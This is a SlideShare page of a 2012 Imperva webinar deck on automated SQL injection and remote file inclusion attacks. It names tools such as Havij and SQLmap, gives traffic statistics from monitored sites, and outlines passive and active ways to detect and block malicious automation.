SlideShare una empresa de Scribd logo

Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground

Imperva
Imperva

Research attributes nearly half of a typical website’s traffic to automated bots. This puts the odds of falling victim to a cyber attack at 100%. Automation tools, such as SQLMap and Havij, open new avenues for amateur and professional hackers to evade security defenses. How will your team prepare for, and stop, malicious, automated site traffic and defend against zero-day attacks? This presentation highlights observed trends in the automation of SQLi and RFI attacks, reveals the warning signs of an automated attack, and suggests identification methods and proven countermeasures to stop attacks.

TecnologíaNoticias y política
1 de 37
Descargar para leer sin conexión
Automated Hacking Tools: The New Rock Stars in the Cyber Underground © 2012 Imperva, Inc. All rights reserved.
Agenda  Context for HII Reports  Introducing Automated Hacking + Quantifying Automation + Hacking Automation Use Cases + Sample Tools  Analyzing Real World Data  Detection and Mitigation  Questions and Answers 2 © 2012 Imperva, Inc. All rights reserved.
Presenter: Amichai Shulman – CTO Imperva  Speaker at Industry Events + RSA, Sybase Techwave, Info Security UK, Black Hat  Lecturer on Info Security + Technion - Israel Institute of Technology  Former Security Consultant to Banks and Financial Services Firms  Leads the Application Defense Center (ADC) + Discovered over 20 commercial application vulnerabilities – Credited by Oracle, MS-SQL, IBM and others Amichai Shulman one of InfoWorld’s “Top 25 CTOs” © 2012 Imperva, Inc. All rights reserved.
HII Report Context  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice + A different approach from vulnerability research  Data set composition + ~50 real world applications + Anonymous Proxies  More than 18 months of data  Powerful analysis system + Combines analytic tools with drill down capabilities 4 © 2012 Imperva, Inc. All rights reserved.
Introducing Automated Hacking 5 © 2012 Imperva, Inc. All rights reserved.
Quantifying Automation 6 © 2012 Imperva, Inc. All rights reserved.
Quantifying Automation RFI SQLi Manual 2% 12% Manual Automatic 88% Automatic 98% 7 © 2012 Imperva, Inc. All rights reserved.
Hacking Automation Use Cases  Automation affects the magnitude of the threat posed by hacking Honeypot.org: The Social Dynamics of Hacking 8 © 2012 Imperva, Inc. All rights reserved.
Hacking Automation Use Cases  Skilled Hackers + Create more powerful tools + Focus not only on finding vulnerabilities but also on robust automation of their exploit (an engineering challenge)  Professional Hackers (Semi-skilled) + Can increase their business faster and more effectively using automation + Puts more organizations at risk as potential targets  Unskilled Hackers + Increased potential of incidental damages 9 © 2012 Imperva, Inc. All rights reserved.
Hacking Automation Use Cases  Botnets + A step further in the evolution of automated hacking + Rather than automating a task it is automation of the entire operation  Includes all steps of the operation + Target selection + Probing + Exploit 10 © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools  Search engine hacking + Discovery phase + Mostly botnet based today  General scanners + Probing of chosen targets  Focused on attack type  Focused on individual vulnerability + Exist as standalone tools and botnet modules 11 © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools  High-end  Havij + Slick GUI (point and + Focused on SQL click) Injection attacks + Evasion techniques + Used in attacks by + State of the art attack Lulzsec and vectors Anonymous 12 © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools 13 © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools  Professional  SQLmap + Command line + Focused on SQL + Ready for Injection instrumentation  FIMAP + Focused on Remote File Include 14 © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools 15 © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools  WhiteHat flipping  Nikto + Public domain, sides low end + Tools aimed at  Nessus vulnerability scanning + Public domain + Automation is essential for (some versions), continuous testing of very friendly GUI large and complex web  Acunetix applications + Powerful commercial tool, + Inherently easier to stolen licenses operate are shared among hackers 16 © 2012 Imperva, Inc. All rights reserved.
Analyzing Real World Data 17 © 2012 Imperva, Inc. All rights reserved.
Type of Automation  The type of automation is tightly related to the nature of the vulnerability to be exploited  SQL Injection + Tools that focus on an individual application at a time + High volume, high rate traffic generated against a single application  RFI + Tools that try to cover as many applications as possible + Low volume traffic when watching a single application  Search Engine Hacking + Need to bypass search engine restrictions + Highly distributed botnets © 2012 Imperva, Inc. All rights reserved.
Type of Automation 19 © 2012 Imperva, Inc. All rights reserved.
Type of Automation  RFI Attacks  Many sources attack more than one target © 2012 Imperva, Inc. All rights reserved.
Persistence of Sources  A fair amount of attack sources are persistent over time + Persistent source = more than 3 days of activity + 30% of SQLi attacks + 60% of RFI attacks 10000 SQLi Attacks (Log scale) 1000 100 10 1 0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100 Activity Days 21 © 2012 Imperva, Inc. All rights reserved.
Persistence of Sources  RFI Attacks  Many consistent attackers © 2012 Imperva, Inc. All rights reserved.
Persistence of Attack Vectors  RFI Attacks  Collect URLs that host infection script  Some URLs are being used consistently over time © 2012 Imperva, Inc. All rights reserved.
Persistence of Attack Vectors  Many shell URLs are used against more than one target © 2012 Imperva, Inc. All rights reserved.
Country of Origin  Most attack sources are in the US  Most high rate automation sources are in China! SQLi SQLi Country Hosts % of Hosts Country Hosts % of Hosts USA 3994 80 China 98 30 China 355 7 USA 78 24 United Kingdom 75 2 Netherlands 9 3 Russian Federation 49 1 Morocco 8 2 Canada 40 1 Egypt 7 2 Republic of Korea 33 1 Luxemburg 7 2 Germany 31 1 Brazil 7 2 Brazil 29 1 France 7 2 India 28 1 Indonesia 6 2 France 24 1 Russian Federation 6 2 25 © 2012 Imperva, Inc. All rights reserved.
Detection and Mitigation 26 © 2012 Imperva, Inc. All rights reserved.
General  Motivation + Automated hacking accounts for a large portion of attack traffic + Being able to detect malicious automation dramatically reduces the stress on other mechanisms designed to detect specific attacks  Challenge + Hard to implement WITHIN applications as automation can be applied against each and every part of the application or the underlying application server © 2012 Imperva, Inc. All rights reserved.
Detecting Automated Hacking - Passive  Passive Methods + Watch network traffic “as-is” + Non intrusive, do not affect user experience  Traffic Shape Indicators + We measure suspicious requests (rather than ALL requests) + Measured attributes – Rate – Rate change (ramp-up speed) – Volume + Difficult to measure in an inherently noisy source (NAT)  Request Shape Indicators + Missing headers + Mismatch between headers and location 28 © 2012 Imperva, Inc. All rights reserved.
Detecting Automated Hacking - Passive 29 © 2012 Imperva, Inc. All rights reserved.
Detecting Automated Hacking - Active  Introduce changes into the server response + Test client’s reaction to changes + May affect user experience – use with care + Verify type of user agent  Browsers support Javascript and an appropriate DOM + Client is expected to complete some computation + Application / GW can validate the computed value  Browsers comply with HTML tags (IMG, IFRAME) + Client is expected to access resource referenced by embedded tags + Failure to access the resources implies that client is an automated script 30 © 2012 Imperva, Inc. All rights reserved.
Mitigation - Wisdom of the Crowds  Detected automation feeds into building fingerprints of tools and reputation data for sources  Leveraged when data is collected within a community  Recent regulatory changes endorse the concept of community  Drop requests matching fingerprints or coming from ill reputed sources 31 © 2012 Imperva, Inc. All rights reserved.
Mitigation – Challenges and Metering  Introduce changes to the response that require a true browser user-agent before letting any further requests within a session + Application / GW keeps sending the test for any request not in a validated session + A session is validated only if user-agent responds properly  Introduce changes to the response that (based on the previous enforcement) introduce client side latency + Challenge the client to solve a mathematical riddle + Partial hash collisions are a good example 32 © 2012 Imperva, Inc. All rights reserved.
Mitigation (cont.)  Introduce CAPTCHA or other test to tell apart a human operator from a script 33 © 2012 Imperva, Inc. All rights reserved.
Summary  Automation is ruling the threat landscape + It accounts for the lion share of attack traffic  Automation is used in various forms + In depth scanning / attack of a single target + Wide breadth scanning / attack of multiple applications + Distributed scanning / attack of single / multiple applications 34 © 2012 Imperva, Inc. All rights reserved.
Summary (cont.)  Detection and mitigation are essential for reducing noise and focusing resources on the most complex attacks  Detection and mitigation are most effectively deployed out side of the application  Detection and mitigation must include a combination of passive and active measures  Detection and mitigation are best utilized within a community that can generate reputation data 35 © 2012 Imperva, Inc. All rights reserved.
Webinar Materials Join Our LinkedIn Group, Imperva Data Security Direct for… Answers to Post-Webinar Attendee Discussions Questions Webinar Webinar Slides Recording Link © 2012 Imperva, Inc. All rights reserved.
www.imperva.com - CONFIDENTIAL -

Recomendados

Milton smith 2013
Milton smith 2013Milton smith 2013
Milton smith 2013jowen_evansdata
 
DSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems Intelligence
DSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems IntelligenceDSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems Intelligence
DSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems IntelligenceAndris Soroka
 
From app sec to malsec malware hooked, criminal crooked alok gupta
From app sec to malsec malware hooked, criminal crooked alok guptaFrom app sec to malsec malware hooked, criminal crooked alok gupta
From app sec to malsec malware hooked, criminal crooked alok guptaowaspindia
 
IBM Security Day, Cuenca - Ecuador
IBM Security Day, Cuenca - EcuadorIBM Security Day, Cuenca - Ecuador
IBM Security Day, Cuenca - EcuadorOlmedo Abril Arboleda
 
Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb AppsDenim Group
 
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)Detection of Malware Downloads via Graph Mining (AsiaCCS '16)
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)Marco Balduzzi
 
Malware classification and detection
Malware classification and detectionMalware classification and detection
Malware classification and detectionChong-Kuan Chen
 
Collective classification for unknown malware detection - SECRYPT 2011
Collective classification for unknown malware detection - SECRYPT 2011Collective classification for unknown malware detection - SECRYPT 2011
Collective classification for unknown malware detection - SECRYPT 2011Carlos Laorden
 

Recomendados

Milton smith 2013
Milton smith 2013Milton smith 2013
Milton smith 2013jowen_evansdata
 
DSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems Intelligence
DSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems IntelligenceDSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems Intelligence
DSS ITSEC Conference 2012 - SIEM Q1 Labs IBM Security Systems IntelligenceAndris Soroka
 
From app sec to malsec malware hooked, criminal crooked alok gupta
From app sec to malsec malware hooked, criminal crooked alok guptaFrom app sec to malsec malware hooked, criminal crooked alok gupta
From app sec to malsec malware hooked, criminal crooked alok guptaowaspindia
 
IBM Security Day, Cuenca - Ecuador
IBM Security Day, Cuenca - EcuadorIBM Security Day, Cuenca - Ecuador
IBM Security Day, Cuenca - EcuadorOlmedo Abril Arboleda
 
Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb AppsDenim Group
 
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)Detection of Malware Downloads via Graph Mining (AsiaCCS '16)
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)Marco Balduzzi
 
Malware classification and detection
Malware classification and detectionMalware classification and detection
Malware classification and detectionChong-Kuan Chen
 
Collective classification for unknown malware detection - SECRYPT 2011
Collective classification for unknown malware detection - SECRYPT 2011Collective classification for unknown malware detection - SECRYPT 2011
Collective classification for unknown malware detection - SECRYPT 2011Carlos Laorden
 
Deconstructing Application DoS Attacks
Deconstructing Application DoS AttacksDeconstructing Application DoS Attacks
Deconstructing Application DoS AttacksImperva
 
Unmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackUnmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackImperva
 
Assessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsAssessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsImperva
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackImperva
 
Top Security Trends for 2013
Top Security Trends for 2013Top Security Trends for 2013
Top Security Trends for 2013Imperva
 
Security Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsSecurity Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsPeter Wood
 
Thread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalThread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalRobin Lutchansky
 
Key Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales PresentationKey Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales Presentationrfragola
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakImperva
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakImperva
 
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...SecPod
 
How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?SecPod
 
Managing Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemManaging Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemDenim Group
 
TDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsTDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsMalik Mesellem
 
Uncovering Vulnerabilities Beyond Software Vulnerabilities
Uncovering Vulnerabilities Beyond Software VulnerabilitiesUncovering Vulnerabilities Beyond Software Vulnerabilities
Uncovering Vulnerabilities Beyond Software VulnerabilitiesSecPod
 
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...APIsecure_ Official
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsEric Vétillard
 
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...IBM Security
 
Apresentação Allen ES
Apresentação Allen ESApresentação Allen ES
Apresentação Allen ESAllen Informática
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?michelemanzotti
 
Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyImperva
 
API Security Survey
API Security SurveyAPI Security Survey
API Security SurveyImperva
 

Más contenido relacionado

Similar a Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground

Deconstructing Application DoS Attacks
Deconstructing Application DoS AttacksDeconstructing Application DoS Attacks
Deconstructing Application DoS AttacksImperva
 
Unmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackUnmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackImperva
 
Assessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsAssessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsImperva
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackImperva
 
Top Security Trends for 2013
Top Security Trends for 2013Top Security Trends for 2013
Top Security Trends for 2013Imperva
 
Security Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsSecurity Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsPeter Wood
 
Thread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalThread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalRobin Lutchansky
 
Key Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales PresentationKey Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales Presentationrfragola
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakImperva
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakImperva
 
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...SecPod
 
How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?SecPod
 
Managing Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemManaging Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemDenim Group
 
TDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsTDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsMalik Mesellem
 
Uncovering Vulnerabilities Beyond Software Vulnerabilities
Uncovering Vulnerabilities Beyond Software VulnerabilitiesUncovering Vulnerabilities Beyond Software Vulnerabilities
Uncovering Vulnerabilities Beyond Software VulnerabilitiesSecPod
 
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...APIsecure_ Official
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsEric Vétillard
 
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...IBM Security
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?michelemanzotti
 

Similar a Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground (20)

Deconstructing Application DoS Attacks
Deconstructing Application DoS AttacksDeconstructing Application DoS Attacks
Deconstructing Application DoS Attacks
 
Unmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackUnmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
 
Assessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsAssessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus Solutions
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! Hack
 
Top Security Trends for 2013
Top Security Trends for 2013Top Security Trends for 2013
Top Security Trends for 2013
 
Security Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsSecurity Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent Threats
 
Thread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalThread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final Final
 
Key Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales PresentationKey Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales Presentation
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers Break
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers Break
 
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...
How Mid Size Enterprises Can Automate Vulnerability Management and Prevent Cy...
 
How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?
 
Managing Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemManaging Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix Ecosystem
 
TDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsTDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applications
 
Uncovering Vulnerabilities Beyond Software Vulnerabilities
Uncovering Vulnerabilities Beyond Software VulnerabilitiesUncovering Vulnerabilities Beyond Software Vulnerabilities
Uncovering Vulnerabilities Beyond Software Vulnerabilities
 
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of Things
 
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
 
Apresentação Allen ES
Apresentação Allen ESApresentação Allen ES
Apresentação Allen ES
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
 

Más de Imperva

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyImperva
 
API Security Survey
API Security SurveyAPI Security Survey
API Security SurveyImperva
 
Imperva ppt
Imperva pptImperva ppt
Imperva pptImperva
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountImperva
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Imperva
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesImperva
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchImperva
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecurityImperva
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRImperva
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware Imperva
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged VendorsImperva
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet SophisticationImperva
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made EasyImperva
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceImperva
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyImperva
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR PlanImperva
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataImperva
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityImperva
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationImperva
 

Más de Imperva (20)

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 Survey
 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
 
Imperva ppt
Imperva pptImperva ppt
Imperva ppt
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over Lunch
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber Security
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPR
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet Sophistication
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made Easy
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense Report
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat Intelligence
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR Plan
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your Data
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data Security
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 

Último

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
